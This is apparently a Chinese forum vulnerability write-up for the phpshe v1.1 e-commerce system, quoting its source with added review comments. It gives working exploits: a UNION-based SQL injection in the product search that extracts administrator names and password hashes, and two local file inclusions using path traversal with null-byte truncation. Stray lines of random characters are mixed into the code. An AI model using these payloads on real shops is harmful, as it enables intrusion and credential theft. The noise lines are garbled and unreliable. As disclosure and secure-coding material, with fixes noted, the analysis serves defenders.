
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell

作者: admin    时间: 2013-4-16 16:45
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 参数传递总览（common.php）

// common.php — request variable import (quoted from phpshe v1.1 as shipped; forum noise stripped)
//
// Every key of $_GET / $_POST / $_SESSION / $_COOKIE becomes a global with a
// source prefix: $_g_*, $_p_*, $_s_*, $_c_*. The prefix keeps a request key
// from clobbering an unprefixed global, but it does NOT make the value safe:
// the listings below use $_g_keyword, $_g_orderby and $_p_info from here
// directly in SQL and in include() paths.
// pe_trim() / pe_stripslashes() are not shown — presumably recursive trim /
// stripslashes; nothing in this block escapes for SQL or for file paths.
if (get_magic_quotes_gpc()) {
    // magic_quotes is undone first, so the imported value is the raw client string.
    // NOTE(review): get_magic_quotes_gpc() no longer exists on PHP 8 — this call is fatal there.
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies are stripslashed unconditionally. index.php later passes
// $_c_cart_list — i.e. the raw "cart_list" cookie — to unserialize().
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
0x01 包含漏洞（index.php 的 $mod）

// index.php (site front page) — quoted from phpshe v1.1 as shipped.
// NOTE(review): the paste had this collapsed onto one HTML-escaped line
// ("<!--?php", "$db--->"); it is re-wrapped here, code otherwise unchanged.
<?php
include('common.php');   // imports $_g_*/$_p_*/$_s_*/$_c_* and sets $module/$mod/$act (see the router below)
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();   // $cache_setting presumably set in common.php — not shown
// Untrusted deserialization: for a visitor who is not logged in, $_c_cart_list
// is the raw cart_list cookie (extract() in common.php) and goes straight into
// unserialize(). Whether a usable gadget chain exists in this codebase is not
// shown; unserialize() on client input is unsafe regardless — json_decode() or
// a server-side cart would be the fix. Not covered by the write-up.
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// Local file inclusion: $mod is the raw mod= parameter (POST or GET, router
// in common.php) with no whitelist, so "../" walks out of module/. $module
// keeps its default 'index' as far as the router shows. The fixed ".php"
// suffix is why the exploit appends %00 — null-byte truncation of include
// paths only works on PHP < 5.3.4; on newer PHP only *.php files are reachable.
// Fix: resolve $mod against a fixed list of module names (or reject anything
// not matching /^[a-z]+$/) before building the path.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
// common.php, from line 15: URL routing (quoted from phpshe v1.1 as shipped)
// POST wins over GET; the default for $module/$mod/$act is 'index'. Nothing
// here restricts $mod, $act or $id to a known set — each consumer is left to
// validate, and index.php uses $mod in an include() path without doing so.
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// $id has no default above, so it stays undefined when neither source sends one;
// product.php casts it with intval(), order.php escapes it with pe_dbhold().
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
// exp: http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
// (%00 cuts off the ".php" suffix; requires PHP < 5.3.4 — on later versions the
// traversal still works but can only include files that end in .php)


0x02 搜索注入（product.php list 的 keyword / orderby）

<code id="code2">

//product.php — 'list' action (quoted from phpshe v1.1 as shipped; forum noise stripped)
case 'list':
    $category_id = intval($id);   // the only cast/escape applied on this path
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // The WHERE / ORDER BY tail is built by string concatenation and handed to
    // pe_selectall(), which appends it to the query verbatim (see below).
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // NOTE(review): this line was garbled in the paste; the target variable is
        // assumed to be $sqlwhere (the following lines append to it).
        $sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // SQL injection: $_g_keyword is the raw keyword= parameter (extract() in
    // common.php, passed through pe_trim() only) dropped inside a quoted LIKE.
    // A single quote closes the literal — see the UNION payload below. Escape it
    // the way order.php escapes $_g_id (pe_dbhold), or better, bind it.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'";
    if ($_g_orderby) {
        // orderby=<col>_<dir>. Both halves are interpolated unescaped: [0] sits
        // inside backticks, [1] is bare after ORDER BY, constrained only by
        // explode()'s split on '_'. This is a second injection point the
        // write-up does not cover. Fix: whitelist [0] against the known
        // product_* columns and accept only 'asc'/'desc' for [1].
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // $_g_page (page=) also reaches the query via the limit pair; how
    // sql_selectall() treats it is not shown.
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // best-seller ranking
    $product_hotlist = product_hotlist();
    // breadcrumb path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进selectall函数库
/**
 * Select all rows of `$table` that satisfy `$where`.
 *
 * @param string       $table      table name without the dbpre prefix; interpolated raw
 * @param string|array $where      " and ..." SQL fragment (product.php) or a column=>value array (order.php)
 * @param string       $field      column list, interpolated raw (default '*')
 * @param array        $limit_page [per_page, page] pair handed through to sql_selectall()
 * @return mixed whatever sql_selectall() returns (not shown here)
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // _dowhere() normalises the condition. It is not shown, but the product.php
    // UNION payload only works if a string $where is appended unchanged — so
    // callers that concatenate user input into $where are injectable here.
    $condition = $this->_dowhere($where);
    $sql = sprintf('select %s from `%s%s` %s', $field, dbpre, $table, $condition);
    return $this->sql_selectall($sql, $limit_page);
}
$ X$ [" X, ]+ t- K0 u1 d8 j) f3 O//exp
$ p* P8 h0 F3 B: r) J4 p1 Wproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='10 Z$ g/ b. A/ w' L: A0 r

</code>
& A) x4 F$ B$ y9 P4 c# D! p6 H 7 v8 b3 |1 }* U9 p' n. q
0x03 包含漏洞2（order.php pay 的 info[order_payway]）
<code id="code3">

//order.php — 'pay' step of the order controller (quoted from phpshe v1.1 as shipped; forum noise and blank lines stripped)
case 'pay':
    // The order id is the one client input on this path that is escaped.
    $order_id = pe_dbhold($_g_id);
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        // payway_config comes from the cache, not the request; unserialize()
        // here is only as trustworthy as whoever can write that cache entry.
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // flatten bank_text to one line for the template; '\n' is the
            // two-character literal, not a newline.
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    // Lookup is by order id + "notpay" only. No check that the order belongs
    // to the current user is visible here, so any existing unpaid order id
    // (the exploit below uses 1304070001) is enough to reach the code that follows.
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');   // pe_error presumably stops the script — not shown
    if (isset($_p_pesubmit)) {
        // Mass assignment: $_p_info is the raw POST array info[...] (extract()
        // in common.php) and is written to the order row as-is. Which columns
        // a client can overwrite this way depends on pe_update(), not shown.
        // Presumably this also stores the attacker's order_payway value before
        // the include below runs.
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // Local file inclusion: order_payway is client-chosen and is never
            // compared with the configured payways loaded into $cache_payway
            // above, so "../" leaves include/plugin/payway/. The %00 in the
            // exploit truncates "/order_pay.php"; that only works on PHP < 5.3.4.
            // Fix: require isset($cache_payway[$_p_info['order_payway']]) — and
            // check it before the pe_update() too, so a bad value is never stored.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        } // original author: once everything is in place, the (limited) include can be triggered
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;

}

//exp:

//GET: http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001  （id 必须是一个存在且 order_state 为 notpay 的订单号）

//POST body: info[order_payway]=alipay/../../../1.txt%00&pesubmit=立即支付
//（URL 编码形式: info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98 ；%00 截断仅在 PHP < 5.3.4 生效）</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg



